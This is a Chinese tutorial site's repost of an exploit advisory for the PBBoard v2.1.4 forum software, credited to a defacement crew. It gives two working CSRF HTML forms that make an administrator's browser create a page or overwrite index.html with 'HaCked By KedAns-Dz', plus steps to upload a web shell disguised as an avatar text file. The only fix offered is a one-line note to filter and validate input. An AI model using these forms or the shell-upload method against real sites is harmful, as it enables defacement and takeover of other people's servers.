来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 标题: PBBoard v2.1.4 = Multiple Vulnerabilites作者 : KedAns-Dz www.2cto.com ked-h@hotmail.com | ked-h@exploit-id.com | kedans@facebook.comFacebook : http://facebook.com/KedAns程序脚......
|
标题: PBBoard v2.1.4 <= Multiple Vulnerabilites
作者 : KedAns-Dz www.2cto.com ked-h@hotmail.com | ked-h@exploit-id.com | kedans@facebook.com Facebook : http://facebook.com/KedAns 程序脚本 : php 缺陷分类 : Multiple XSRF/FU 测试平台 : Windows XP-SP3 Fr ### ## # | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << | # | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 | # | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h | # | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE .. | # | ------------------------------------------------- < | ## # [1] XSRF/CSRF Add NeW File => <form action="http://[www.2cto.com]/admin.php?page=pages&add=1&start=1" name="myform" method="post"> <input type="text" name="name" id="input_name" value="dz.html" size="30" /> <textarea name="text" id="textarea_text" rows="17" cols="81" wrap="virtual" dir="/"> HaCked By KedAns-Dz </textarea> <input class="submit" type="submit" value="Submit/Save" name="submit" accesskey="s" /> </form> # [2] XSRF/CSRF Change Index File => <form action="http://[www.2cto.com]/admin.php?page=pages&dit=1&start=1&id=1" name="myform" method="post"> <input type="text" name="name" id="input_name" value="index.html" size="30" /> <textarea name="text" id="textarea_text" rows="17" cols="81" wrap="virtual" dir="/"> HaCked By KedAns-Dz </textarea> <input class="submit" type="submit" value="Submit/Accept" name="submit" accesskey="s" /> </form> # [3] Shell/File Upload : 注册后去 : /index.php?page=usercp&control=1&avatar=1&main=1 # 上传 SHell {Ev!L}.txt + fin him /download/avatar/{Ev!L}.txt 修复: 针对上述代码分析进行过滤和验证 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
